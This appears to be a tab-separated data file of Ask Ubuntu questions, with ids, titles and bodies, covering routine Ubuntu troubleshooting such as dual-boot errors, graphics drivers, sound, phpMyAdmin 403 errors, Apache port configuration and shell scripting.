483241	installing ubuntu 14.04 before windows8.1 error 0xc000000e the bcd of your pc is missing or contains error	i install windows usually before ubuntu , but because there was n't windows after experiencing some hard drive problem i installed ubuntu-gnome-14.04 before windows , but i am unable to install either windows 8.1 or windows server 2012 r2 afterwards . the error i encountered every time i try to make the installation using the usb key ( because the dvd drive of my laptop is broken ) is : windows boot manager windows failed to start . a recent hardware or software change might be the cause . file : \boot\bcd status : oxc000000e info : the boot configuration data for your pc is missing or contains error . how do i solve it ? thanks .
483244	black screen after installing drivers using intel linux driver installer - 14.04	i am new to ubuntu . recently i installed ubuntu 14.04 on my dell inspiron 3537 laptop having intel hd 4400 graphics and amd radeon 8760m graphics card . after installing intel drivers using the intel linux driver installer and rebooting i can not get past the ubuntu loading screen . i have tried every various solutions but no luck . i tried logging in with the recovery mode too . but no chance ! i have tried the procedure mentioned in this question too . my computer boots to a black screen what options do i have to fix it ? is there a way for me to get back the default driver or reset the driver using the livecd ? how can i fix this issue ?
483245	popping from laptop speakers	i decided to switch and stick with ubuntu 14.04 being all the other linux distro 's i 've tried had various issues with the hardware of my computer . i 'm using a 5 year old dell studio 1555 . i 'm still a bit of a linux newbie but i could use some help on fixing this problem . i saw in one thread to disable my microphone which i tried but the speakers still pop . is there any commands or file changes i can try that would help ? it 's not that bad but at random intervals with music playing i 'll hear a random click or two . any help would be appreciated !
483246	how to configure my ubuntu server as a dhcp router	i have a little problem with configuring my ubuntu server properly . on the ubuntu server there are 3 internet cards and one of them is wi-fi card . i read a lot of info for my problem but i couldnt find a solution . i want to connect the ubuntu server directly to the internet without router before the server but i cant setup the server . my ip is 85.122.165.144 subnet mask 255.255.255.0 gateway 85.122.165.1 i cant setup the second internet card . what im doing is : ip address 192.168.1.1 subnet mask 255.255.255.0 gateway 192.168.1.1 also when im trying to install dhcp server the server tells me that it can not find the packets . any idea thy is this happening ?
483247	mpd/ncmpcpp music database synchronization with ipod classic ( possible ) ?	is there any option/possibility , to synchronize my mpd/ncmpcpp music database as it is organized natively through ncmpcpp ( mainly playlists ) with an ipod classic . can someone please shed some light on this matter and a tutorial ( if available ) would be much appreciated ! !
483254	is there anyway to have smaller icons in my ( v13.10 ) toolbar launcher	i 've installed ubuntu tweaks on my 13.10 system . i can use tweaks to increase the launchers icon size from 32 up to 64 however 32 is still too big and the list scrolls too rapidly up and down for others on osx i can make launcher icons really tiny . any way to do this on ubuntu ?
483258	after ubuntu install pc still boots straight to windows xp	i have just installed ubuntu on a machine running windows xp . i selected the option to install alongside windows . everything seemed to go well . when it finished i removed the boot/install dvd and re-booted . the machine booted into windows with no sign of ubuntu . i checked in the disk management tools and , sure enough , there is the partion created for ubuntu but i ca n't find a way to get ubuntu started . i expected to get an option at boot up enabling me to select windows or ubuntu but that does n't happen . sould i be looking for something else or is it likely that something has gone wrong ? thanks in advance for any help/advice offered , simon . edit : i downloaded 14.04 , i did n't do anything explicit to dual boot , i expected that to occur as part of the installation . i will check tose links . sorry if this is a duplicate ... if i knew what grub is and how it is related then i would have searched for it first honestly ! i would n't expect others to do the hard work for me if i can find an answer : ) another edit : progress ! there are two discs in this machine and it does appear that ubuntu created some boot files on the secondary drive as opposed to the boot drive . i am now checking for a solution and will report it here as soon as i find one . thanks for the pointers , simon . last edit : fixed it ! thanks for all your help , i would not have found this on my own . the answer for me was to use this : http : //sourceforge.net/p/boot-repair-cd/home/home/ thanks everybody , simon .
483261	kubuntu : how to change system language , thus not only users language	i 've change my language from english to dutch , but that only affects my account . how to change the language system wide . please , tel me for kubuntu , not ubuntu .
483269	low graphics mode coupled with other errors	so bugbuntu 14.04 hit me again . i upgraded my graphicscard so i thought it would be a good idea to install new drivers . i changed from a hd 5850 to a r9 280x . i took a quick look at the graphicsdriver before installing the new one and it said something along the lines of `` xorg blabla ( open source ) '' under additional drivers . so i downloaded the new driver , ran sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* and installed the new driver with its installer and rebooted . upon reboot i got the low graphics mode error , tried reloading old config , did n't work . ( the menu also severly bugged out , i always got returned to the dialog with `` load old '' and `` reload current '' with no message at all ) . running in low-graphics mode just caused ubuntu to hang indefinitely , same for going to terminal from there . btw : pressing ctrl+alt+f1 there also caused it to hang . so after some googling i tried the recovery mode , failsafex just led to the situation described in the paragraph before . root atleast brought me to console , but started with some error not being able to load /bash/xyz and i could n't use apt-get there because it always errored out saying something was missing . so , any suggestion on how to fix this mess is highly appreciated : )
483273	ca n't comment on youtube videos in chromium	i ca n't comment or like comments on youtube videos like shown here : youtube video this only happens in chromium and not firefox or google chrome . i am running ubuntu 14.04 64bit and version 34.0.1847.116 ubuntu 14.04 aura ( 260972 ) of chromium . could someone help me to get this working in chromium ? reply to krowe i know , but i do n't think this is the reason for this . i took a screenshot with chromium and google chrome running side by side and by the look of it , it looks like i have logged in exactly the same way in both . and as we can see in chromium my profile image does n't show on the comment section , but does in google chrome
483278	upgrading from 10.04 - preserving files	10.04 , update manager offers me an upgrade to 12.04 . if i do this will it preserve the contents of my hard drive or will it reformat and wipe everything ? i have everything in one partition .
483279	what is the effect on an mp3 player used for install of ubuntu ?	when an .iso or .img file is copied with dd , what effect does that have on the usb stick ? in this case , it 's a 2gb mp3 player which , while not expensive to replace , i would like to use again for mp3 's . would it be necessary to reformat the usb mp3 player back to fat32 ? i 'm looking not only at the ubuntu installation directions , for installing from usb ( link not allowed ) , but also in general .
483280	make raid on one harddrive , but many partitions ?	i have been reading a lot about raids and i want to get my hands dirty . the goal : virtualize a copy of ubuntu and play around with raid . this means that there wo n't be more than one hd , hell the os will have just a partition of the hard drive . i know that raids are supposed to synchronize multiple hard-disks ( and not only ) , my question is if that is possible to do on a partition of a virtualized ubuntu ( for learning purposes only )
483281	unable to switch users without logging out in ubuntu 14.04	i have two user accounts , one for me and one for my daughter . we used to go to the button in the upper right corner of the desktop screen and click on another user . usually it works . now if i do that , a black screen appears and everything seems to be blocked .
483283	module verification failed signature and/or required key missing	i am working on a kernel module , which is working fine . however , looking through dmesg , i see a message regarding my module that module verification has failed ( module verification failed signature and/or required key missing ) . how can i resolve this issue ? how do i get my module signed for verification ? thanks .
483284	make second keyboard always use specified layout	this really should be a comment on a reply to the question how to permanently assign a different keyboard layout to a usb keyboard ? since commenting is n't possible , here is the new question , i hope @ sadi is reading it : my wireless keyboard and mouse stopped working after this . it might be related to the fact that the string `` usb keyboard '' is n't contained in the name of my device . lsusb bus 003 device 088 : id 046a:010b cherry gmbh xinput -list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ mlk wireless desktop id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ mlk wireless desktop id=14 [ slave keyboard ( 3 ) ] thus my grep line looks like this : xinput -list | grep 'wireless desktop . *keyboard ' `` $ @ '' any ideas how to fix it ?
483285	how to install package with all dependencies offline !	i have a ubuntu server setup and it does n't have internet , so i 'm downloading packages from packages.ubuntu.com and installing them manually . ( instead of using apt-get ) but the problem is , some of the package dependencies just dose n't install ! for instance http : //packages.ubuntu.com/utopic/build-essential this package depends on the package which depends on 5 other packages and so on it 's going to take me an hour to click all the download links and download all of them . what should i do ? ... ..
483286	my ubuntu 12.10 does n't work and i ca n't install another os	i 've upgraded from ubuntu 12.04 to 12.10 on a low-end machine . it does n't work properly , after i log into the system it shows a black screen with a ( movable ) mouse and i 've read here about a case where ubuntu 12.10 prevented user from installing another os from a cd , i have the same problem ! they fixed if and i am unable to do this and desperately need help ! is there a way to force ubuntu 12.10 to let me boot from a cd without logging in ? i 've configured the bios to boot from a cd if it can but it just goes straight to ubuntu ( i am able to acess advanced options . the only thing i know is that the black-screen is almost caused by the bad graphics card that 's in the machine ! please help
483288	stream from pulseaudio to philips fidelio	i 've been trying to figure out how to configure a philips fidelio 5000 to receive the audio from my laptop . i searched on google and i found that i can set up rygel to create a new device in the pulseaudio options . the problem is that the fidelio does n't have a graphical interface . does anyone knows how can i make that my computer recognize this device that is connected to the wifi network ?
483293	how to emulate middle button to open new app window in trusty unity launcher with a touchpad	i read i need to mouse-middle-button-click icon in the unity launcher to open a new window . i could use a 3 buttons [ wheel- ] mouse , unfortunately i 'd rather keep my laptop with no accessories around and its touchpad has only 2 buttons . this is a cypress touchpad in the ubuntu certified dell xps13-de ( ivy bridge ) l322x . tapping with 3 fingers triggers some windows selector like alt+tab .
483294	i915-3.9-3.8-dkms 0.02 package error	randomly i get error messages like these : oi57.tinypic.com/ffd469.jpg oi60.tinypic.com/t7lkdt.jpg oi59.tinypic.com/1491g60.jpg how can i fix these ?
483295	can ubuntu read music and data cds burnt on windows	i 'm seriously considering switching from winows to ubuntu as i seriously dislike windows 8.1 and have an old emachines el-1600 . i believe this old net top will run 32 bit ubuntu just fine . ( intel atom 230 1.6 ghz processor and 1 gb ram with intel 945g express chipset ) i believe ubuntu 12.04lts will run perfectly , but i 'm hoping the latest lts release will as well . however , that now brings me to my question . i 've burnt a whole pile of mp3 dvdss using win xp , and i was wondering if i install ubuntu can they still be read ? i just want to copy the mp3s back from the dvds back to the main music folder in ubuntu . i have no intention of installing wine ( viruses ) and will beusing the pre-instlled and native ubuntu apps such as libre office and firefox which i 'm already using in windows . i also use a ppoe broadband connection so that wo n't be a problem either . thank you .
483297	why do i always get a 403 error with phpmyadmin ?	i 'm running ubuntu 14.04 lts server and i 'm trying to get phpmyadmin to work . whenever i open up 192.168.0.xxx/phpmyadmin it gives me a 403 error . i also have wordpress installed and i can access that without any issues . i 've tried : setting the ownership to apache restarting my computer/server used a different computer uninstalled/reinstalled it ( including uninstall â install , purge â install , and install -- reinstall ) reading a lot of tutorials/au questions/posts/blogs of how to fix this , yet none of them have shown me a valid solution . one odd thing that i find when looking at the `` homepage '' of the site ( i.e . no /foobar on the end ) , it shows a file explorer . however , it does n't show phpmyadmin . also , it was working a few days ago , and i do n't remember changing anything . the only thing that looks odd about this is there 's usually something with /serv iirc , but that may have just been the way i had it on another server ... note : there 's no .htaccess file in the /usr/share/phpmyadmin folder . i 've seen some articles hinting that there should be one , but i ca n't find a definite answer . /etc/phpmyadmin/apache.conf file : # phpmyadmin default apache configuration alias /phpmyadmin /usr/share/phpmyadmin < directory /usr/share/phpmyadmin > options followsymlinks directoryindex index.php order deny , allow # deny from all allow from all < ifmodule mod_php5.c > addtype application/x-httpd-php .php php_flag magic_quotes_gpc off php_flag track_vars on php_flag register_globals off php_value include_path . < /ifmodule > < /directory > # authorize for setup < directory /usr/share/phpmyadmin/setup > < ifmodule mod_authn_file.c > authtype basic authname `` phpmyadmin setup '' authuserfile /etc/phpmyadmin/htpasswd.setup < /ifmodule > require valid-user < /directory > # disallow web access to directories that do n't need it < directory /usr/share/phpmyadmin/libraries > order deny , allow deny from all < /directory > < directory /usr/share/phpmyadmin/setup/lib > order deny , allow deny from all < /directory > apache config file : # the accept serialization lock file must be stored on a local disk . # mutex file : $ { apache_lock_dir } default # pidfile : the file in which the server should record its process # identification number when it starts . # this needs to be set in /etc/apache2/envvars # pidfile $ { apache_pid_file } # timeout : the number of seconds before receives and sends time out . # timeout 300 keepalive on # maxkeepaliverequests : the maximum number of requests to allow # during a persistent connection . set to 0 to allow an unlimited amount . # we recommend you leave this number high , for maximum performance . # maxkeepaliverequests 100 # keepalivetimeout : number of seconds to wait for the next request from the # same client on the same connection . # keepalivetimeout 5 # these need to be set in /etc/apache2/envvars user $ { apache_run_user } group $ { apache_run_group } # hostnamelookups hostnamelookups off # errorlog : the location of the error log file . errorlog $ { apache_log_dir } /error.log # loglevel : control the severity of messages logged to the error_log . # available values : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the log level for particular modules , e.g . # `` loglevel info ssl : warn '' # loglevel warn # include module configuration : includeoptional mods-enabled/*.load includeoptional mods-enabled/*.conf # include list of ports to listen on include ports.conf # sets the default security model of the apache2 httpd server . it does # not allow access to the root filesystem outside of /usr/share and /var/www . # the former is used by web applications packaged in debian , # the latter may be used for local directories served by the web server . if # your system is serving content from a sub-directory in /srv you must allow # access here , or in any related virtual host . < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /var/www/ > options indexes followsymlinks allowoverride all require all granted < /directory > # accessfilename : the name of the file to look for in each directory # for additional configuration directives . see also the allowoverride # directive . # accessfilename .htaccess # the following lines prevent .htaccess and .htpasswd files from being # viewed by web clients . # < filesmatch `` ^\.ht '' > require all denied < /filesmatch > # the following directives define some format nicknames for use with # a customlog directive . # # these deviate from the common log format definitions in that they use % o # ( the actual bytes sent including headers ) instead of % b ( the size of the # requested file ) , because the latter makes it impossible to detect partial # requests . # # note that the use of % { x-forwarded-for } i instead of % h is not recommended . # use mod_remoteip instead . # logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent # include of directories ignores editors ' and dpkg 's backup files , # see readme.debian for details . # include generic snippets of statements includeoptional conf-enabled/*.conf # include the virtual host configurations : includeoptional sites-enabled/*.conf # vim : syntax=apache ts=4 sw=4 sts=4 sr noet include /etc/phpmyadmin/apache.conf ( i do apologize for dumping a large chunk of text in here , but i 've been working on this for about three hours and i ca n't figure out how to fix this . i 'd be happy to provide any more files if needed , just leave a comment . ) what is causing this and how can i fix it ?
483298	low fps on gaming	today i installed ubuntu and i tried to play minecraft i used to have around 300fps on windows 7 on ubuntu 14.04 lts 64 bit i have 30fps very stable what is wrong ? i 'm using this driver : - `` using nvidia binary driver - version 331.38 from nvidia-331 ( proprietary-tested ) ''
483300	is there any drivers compatible with the monitor mode and ubuntu for nexus touch 4 ?	i installed ubuntu on my nexus touch 4 ( mako ) and i wondered if it will be possible to use the following aircrack-ng to audit networks as if i was on my laptop with aircrack-ng start over ? i already try to install aircrack-ng above , it installs fine , everything starts and works ( airmon-ng , airodump-ng , aireplay-ng , aircrack-ng ) but the problem is that i ca n't put the wifi on my nexus 4 in monitor mode . it shows me an error message like this : `` error while getting interface flags : no such device '' . and just below this message , there is mark `` monitor mode enable on mon0 '' . when i type `` sudo airmon-ng '' to see my wifi interfaces , there are two that appear : `` wlan0 [ phy0 ] '' but also `` p2p0 [ phy0 ] '' . i try to put it into monitor mode also but the same error message appears . in the `` drivers '' section there to mark the two wifi interfaces `` wcnss_wlan '' and in the chipset there `` unknown '' for both wlan interfaces section . i 'd love someone to help me on this : ) . i 'm stuck not being able to put the wifi card from my nexus 4 in monitor mode : - . thank you for your help .
483301	my harddisk partition is n't visible under windows 7 after installing ubuntu !	here is what i did and what happened : i reduced my harddisk ( d ) size by 200 gb ( windows is running on c ( separate ssd ) and on d i have installed some programms and a lot of data ) now i installed ubuntu gnome ( 14.04 ) into this 200 gb . everything worked fine and i could just start ubuntu and windows afterwards . only thing that happend is that windows cant display d anymore and the disk-management-tool on windows tells me that it is invalid . but when i start ubuntu everything is perfectly where it should be my partition has n't been overwritten or sth . like that . so i do n't think i have to repair sth . but all in all i really dont know what to do . fdisk -l : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x9f73ac2b device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs partition 1 does not start on physical sector boundary . /dev/sda2 2048 26570751 13284352 27 hidden ntfs winre /dev/sda3 * 26570752 1045712895 509571072 42 sfs /dev/sda4 1045714942 1465147391 209716225 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 1045714944 1053712383 3998720 82 linux swap / solaris /dev/sda6 1053714432 1465147391 205716480 83 linux disk /dev/sdb : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9f73ac3c device boot start end blocks id system /dev/sdb1 * 2048 206847 102400 27 hidden ntfs winre /dev/sdb2 206848 250066943 124930048 7 hpfs/ntfs/exfat parted -l : model : ata wdc wd7500bpkt-2 ( scsi ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 32,3kb 1049kb 1016kb primary 2 1049kb 13,6gb 13,6gb primary ntfs diag 3 13,6gb 535gb 522gb primary ntfs boot 4 535gb 750gb 215gb extended 5 535gb 540gb 4095mb logical linux-swap ( v1 ) 6 540gb 750gb 211gb logical ext4 model : ata m4-ct128m4ssd3 ( scsi ) disk /dev/sdb : 128gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary ntfs boot , diag 2 106mb 128gb 128gb primary ntfs hope you can help me ! ( yeah i noticed there are a lot of similar posts but in my case the partition does n't disappear i just cant get access anymore from win7 ) @ edit seems like chkdisk cant access d : \ when i use gparted it shows : partition : /dev/sda3 ( +keysymbol ) ; file system : ntfs ; mount point : /media/befoerster/data ; label : data ; size : 485.96 gib ... ; flags : boot ; ( i really dont understand why this partition is mounted under media/bfoerster/data ( is this normal ? ) ) http : //i.stack.imgur.com/ijd5m.png gparted ( i unmounted d now but it made no difference ( d is the 485gib partition ) ) ( you can always tell me if i missed some important details i will add them as fast as possible - if it is sth . i could just google plz give me a hint what i have to search for ) i really need your help i 'm depending on my notebook and the stuff installed on it and i found no solution for my problem by my self .
483302	unable to locate package libsdl1.2-dev	i 'm having issues trying to install sdl to run some applications . i used a string given by the faq of the app i was trying to run , but this is the result . devlin @ diningroomhp : ~ $ sudo apt-get install libsdl1.2-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libsdl1.2-dev e : could n't find any package by regex 'libsdl1.2-dev' anyone able to help with this ?
483308	what are the differences between vim.basic and vim.tiny ?	my favorite editor is vim , so i decided to change the default editor of my ubuntu installation with the following command : sudo update-alternatives -- config editor a prompt ( with listed options ) came up asking for an editor , but i noticed that it listed two flavors of vim : /usr/bin/vim.basic /usr/bin/vim.tiny what is the difference between the basic and tiny options ?
483309	can you open a libreoffice draw file in ms publsiher ?	i 've been searching for quite a while , and all i 've found is where libreoffice added support to be able to open ms publisher files in draw . but i will soon be putting lubuntu on my parents computer , and my mom uses publisher a lot for work ( teacher ) , and she does some stuff at home . if she opens a publisher file , edits it , then tries to open it at work , will she be able to ? if not , is there another program that this will work with ? if not , it looks like my only option will be to put vb or vm ware on an eight year old computer and install xp in there and hope it does n't die ... thanks for any help !
483319	problem with installing lubuntu via usb on an acer aspire one zg5	i tried installing lubuntu on an acer aspire zg5 via an bootable usb i made with unetbootin . last night i was able to boot up without installing . today i tried to boot up again and the screen says boot aborted . when i try to boot up normally the computer does n't boot and it makes a loud beeping sound . what did i do wrong ? do i need to make a new bootable usb ? try another distro ?
483320	ld library path	i am not sure whether my ld_library_path is working . i installed qt5.2.1 on ubuntu and tried to execute an application from the command line using sudo ./app1 . ( app1 needs sudo access , hence i executed this way ) the folder having *.so files qt5.2.1/tools/qtcreator/lib/qtcreator is provided in the ld_library_path in bashrc file , but i am getting the following error ./app1 : error while loading shared libraries : libqt5quick.so.5 : can not open shared object file : no such file or directory when i copied all the qt so files from qtcreator to /usr/lib , the application worked . can someone help me understand the concept , why it is not able to take the library from the ld_library_path , whereas it works with qt so files in the standard /usr/lib path also , what should be done to make this work without copying the .so files to /usr/lib .
483322	rhythmbox refuses to start	i recently opened rhythmbox , tried to play a song , and it froze . i killed it , but now it wo n't start at all . running from the terminal gives me ( rhythmbox:3676 ) : rhythmbox-critical ** : timeout was reached . i have tried uninstalling and re-installing , but it did n't help .
483323	ubuntu 13.10 nvidia display issues	i 've been attempting to fix an issue all day to no success . i 'm facing a problem that is only allowing me to use my inbuilt graphics card . i have three monitors and an nvidia geforce gtx 660 ; i 've attempted to install the nvidia drivers but it seems to have failed somewhere . it turns out i can not post an image because i do n't have the required reputation . i 'll try to explain it . when i boot ubuntu , a box comes up notifying me there 's a new version of ubuntu . the box has no border or minimize/maximize buttons , it 's literally just the content . if anybody knows a fix and needs to know any more information , i 'd be happy to give you it . thanks . edit : i 've managed to fix the screen resolution issue for one of the monitors . the above problem still persists . edit : i 've gone into the control manager thingy , enabled unity and everything it needed . still does n't seem to work . i 've also tried reinstalling unity .
483324	how to make gksudo or gksu sessions last longer in ubuntu	every time i want to open a gui program that needs root permissions , i have to put my password . for example , i open synaptic and put my password then close it and a second later decide to reopen it it asks for the password again . ubuntu 9.04 was n't like that , it had a timeout of around 1 minute between sessions . i would like that again on the newer version of ubuntu . i know how to make sudo sessions last longer in ubuntu . all i have to do is type sudo visudo then change defaults env_reset to defaults env_reset , timestamp_timeout=180 ( 3 minutes ) is there a similar way to change the gksu sessions timemouts ?
483326	equivalent to command prompt 's `` tree '' command ?	back in my ( sucky ) windows days , i used the tree command to view the file hierarchy in a pretty display . i am aware of the find command , but to actually process any data in my clogged 241,416 folders/files from just checking each line is as possible as time travelling ... ./build/cmakefiles/cmake.check_cache ./build/cmakefiles/makefile.cmake ./build/cmakefiles/cmaketmp ./build/cmakefiles/targetdirectories.txt ./build/cmakefiles/compilerid.dir ./build/cmakefiles/compilerid.dir/depend.make ./build/cmakefiles/compilerid.dir/flags.make ./build/cmakefiles/compilerid.dir/dependinfo.cmake ./build/cmakefiles/compilerid.dir/link.txt ./build/cmakefiles/compilerid.dir/build.make ./build/cmakefiles/compilerid.dir/cmake_clean.cmake ./build/cmakefiles/compilerid.dir/main.o ./build/cmakefiles/compilerid.dir/cxx.includecache ./build/cmakefiles/compilerid.dir/progress.make ./build/cmakefiles/compilerid.dir/depend.internal ./build/cmake_install.cmake ./build/cmakecache.txt ./build/makefile ./build/compilerid ./compilerid.kdev4 ./.kdev4 ./.kdev4/compilerid.kdev4 ./main.cpp output of find on one folder holding the files of a one-file , incomplete c++ project on windows , the tree command gave a diagram-like output that is human readable screenshot of the pretty tree command so , my question is , is there anything graphically close to the windows/dos tree command ?
483330	access http server into port 8080 in ubunru	access http server on port 8080 on ubuntu netstat -tulpn output : connexions internet actives ( seulement serveurs ) proto recv-q send-q adresse locale adresse distante etat pid/program name tcp 0 0 0.0.0.0:13000 0.0.0.0 : * listen 1941/bearerbox tcp 0 0 0.0.0.0:13001 0.0.0.0 : * listen 1941/bearerbox tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1141/mysqld tcp 0 0 0.0.0.0:13131 0.0.0.0 : * listen 1994/smsbox tcp 0 0 0.0.0.0:5900 0.0.0.0 : * listen 2844/vino-server tcp 0 0 127.0.0.1:5941 0.0.0.0 : * listen 2200/teamviewerd tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen 1616/dnsmasq tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 1065/sshd tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 3149/cupsd tcp 0 0 127.0.0.1:5432 0.0.0.0 : * listen 1227/postgres tcp6 0 0 : ::5800 : : : * listen 2844/vino-server tcp6 0 0 : ::5900 : : : * listen 2844/vino-server **tcp6 0 0 : ::8080 : : : * listen 7062/apache2** tcp6 0 0 : ::80 : : : * listen 7062/apache2 tcp6 0 0 : ::22 : : : * listen 1065/sshd tcp6 0 0 : :1:631 : : : * listen 3149/cupsd udp 0 0 0.0.0.0:631 0.0.0.0 : * 1117/cups-browsed udp 0 0 0.0.0.0:43858 0.0.0.0 : * 785/avahi-daemon : r udp 0 0 0.0.0.0:5353 0.0.0.0 : * 785/avahi-daemon : r udp 0 0 0.0.0.0:42579 0.0.0.0 : * 1204/dhclient udp 0 0 127.0.1.1:53 0.0.0.0 : * 1616/dnsmasq udp 0 0 0.0.0.0:68 0.0.0.0 : * 1204/dhclient udp6 0 0 : ::5353 : : : * 785/avahi-daemon : r udp6 0 0 : ::52679 : : : * 785/avahi-daemon : r udp6 0 0 : ::3779 : : : * 1204/dhclient nmap : my wan ip adress is 41.125.130.148 : nmap 41.125.130.148 starting nmap 6.40 ( http : //nmap.org ) at 2014-06-14 19:32 cet nmap scan report for 41.125.130.148 host is up ( 0.0012s latency ) . not shown : 996 closed ports port state service 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 80/tcp open http nmap done : 1 ip address ( 1 host up ) scanned in 20.30 seconds my apache config /etc/apache2 : cat /etc/apache2/ports.conf # if you just change the port or add more ports here , you will likely also # have to change the virtualhost statement in # /etc/apache2/sites-enabled/000-default.conf listen 80 listen 8080 < ifmodule ssl_module > listen 443 < /ifmodule > < ifmodule mod_gnutls.c > listen 443 < /ifmodule > vim : syntax=apache ts=4 sw=4 sts=4 sr noet i test access localhost:8080/html/playsms it 's ok but on 125.130.148:8080/html/playsms it 's ko and down : (
483339	sound randomly muting in ubuntu 14.04	pulseaudio or alsa , i can not tell which , randomly mutes itself for no reason . this is extremely frustrating . it happens typically when i am playing a game , but can also happen when playing a movie . i have tried muting my microphone when not using it ; this does nothing . i have also tried googling for fixes , and have found nothing . any suggestions ?
483341	how to tile window by mouse to left/right edge in xfce ( like in unity ) ?	i do n't interesting in shortcuts . i want to do it by dragging windows .
483344	problem installing dolphin emulator	i have tried to install dolphin emulator using ppa . i added the ppa , updated then i tried to install using sudo apt-get install dolphin-emu . it said that the package was not found . i am using ubuntu 14.04 .
483346	no sound after fresh installation	fresh installation of version 14.04 64-bit on a sony vaio . completelety reformatted hd . single os system . no sound of any kind . but there is sound from plugged in headphones . everything is unmuted in sound settings . i do n't see any hardware tab there . in the output tab there are 2 options : digital output s/pdif ( built-in audio ) and headphones ( built-in audio ) . it looks like ubuntu does n't see my sound hardware ( most likely it is a sound processor built into the motherboard and not a stand alone sound card ) . i ran pacmd dump-volumes command and got this : welcome to pulseaudio ! use `` help '' for usage information . > > > sink 20 : reference = 0 : 80 % 1 : 80 % , real = 0 : 80 % 1 : 80 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 80 % 1 : 80 % , save = yes source 1 : reference = 0 : 101 % 1 : 101 % , real = 0 : 101 % 1 : 101 % , soft = 0 : 101 % 1 : 101 % , current_hw = 0 : 100 % 1 : 100 % , save = yes output 5 : volume = 0 : 100 % , reference_ratio = 0 : 100 % , real_ratio = 0 : 100 % , soft = 0 : 100 % , volume_factor = 0 : 100 % , volume_factor_source = 0 : 100 % 1 : 100 % , save = no source 21 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no any suggestions will be greatly appreciated , but i would prefer as many details as possible since ubuntu is totally new to me .
483356	turn off screen when inactive only on battery power	in the `` brightness and lock '' settings there is a nice feature to automatically turn off the screen after a period of inactivity , but i only want to do this on battery power . when plugged in , i always want the screen on . the `` power '' settings have two separate settings for `` on battery power '' and `` when plugged in '' , but brightness does n't work this way . any way around this ?
483358	mate menu is missing	i have freshly installed ubuntu 14.04 and i installed mate using apt-get install mate-desktop-environment ( and before that , i added needed repositories from mate official website ) . everything worked fine . however , when i started a mate session , it looked like this : how can i get the panels/menus ? as seen here :
483359	how can i batch convert mkv files to mp4 ?	at moment i use the single video command of : avconv -i file_name1.mkv -codec copy file_name1.mp4 to change format but i need a method to do this for over 400 videos what would the batch command be ?
483361	how to install zulucrypt in ubuntu !	hi everybody , i want to know how to install zulucrypt in ubuntu 14.04 ?
483363	good shell script to move a file to another location ?	i 'm trying to write a shell scrip to move a file to a a different location when it 's found . and when it 's not found to move a file from that different location to its location . this is basically my first try at writing shell scripts so be easy on me . # ! /bin/bash file=/usr/lib/mozilla/plugins/libfreshwrapper.so ; if [ -f $ file ] ; then echo `` file $ file exists '' echo `` moving $ file to home '' mv -f $ file /home/jon/temporary else echo `` file $ file does not exists '' echo `` moving file back '' mv -f /home/jon/temporary/libfreshwrapper.so /usr/lib/mozilla/plugins echo `` done ! '' fi this is my problem . file /usr/lib/mozilla/plugins/libfreshwrapper.so exists moving /usr/lib/mozilla/plugins/libfreshwrapper.so to home mv : missing destination file operand after â/home/jon/temporaryâ
483367	ubuntu 14.04 - after doing something to the grub config and reverting it , i can not log in	i wanted ubuntu to boot into text mode instead of grapical mode , so i followed a tutorial and went ahead with editing /etc/default/grub so that grub_cmdline_linux_default= '' text '' instead of grub_cmdline_linux_default= '' quiet splash '' . it worked , but i could not start the gui with startx . i use awesomewm as my window manager , so my .xinitrc file looks like : # ! /usr/bin/env bash xinit awesome & when i ran startx , the command did some stuff ( as in print a bunch of things to the screen that only linux gurus would understand ) and then the screen went dark for a few seconds . then , the command line returned and said something along the lines of `` x server lost connection '' . when things do n't work , i revert everything . i reverted /etc/default/grub to the state it was in before i made the change , ran sudo update-grub , and rebooted . then things got weird . my user is set to autologin in the lightdm config . when i installed awesome , i also set the user-session to `` awesome '' . everything worked then . but after i reverted my grub file , lightdm seemed to not autologin anymore . so , i tried to login in manually by entering my password and everything . the screen went dark for a few seconds , and then returned to lightdm . i think this has something to do with my user because i can use a guest session just fine . i am using the guest session to write this right now . can someone guide me through fixing this ? edit : i think it might be useful for me to say that i can access the root command prompt via recovery mode if i need to do anything . edit again : i fixed it ! i found that the error changed and that the xauthority files were owned by root instead of my user . after googling around a bit , i found a guy with the same issue though different error , and his fix worked for me .
483372	ubuntu cinnamon menu is too tall for my netbooks screen	i decided i wanted to try out ubuntu cinnamon on my acer aspire one d257 , but the start menu is too tall for the 1024x600 display . please help me , i do not need cinnamon to work but it would be a nice alternative to unity . thank you !
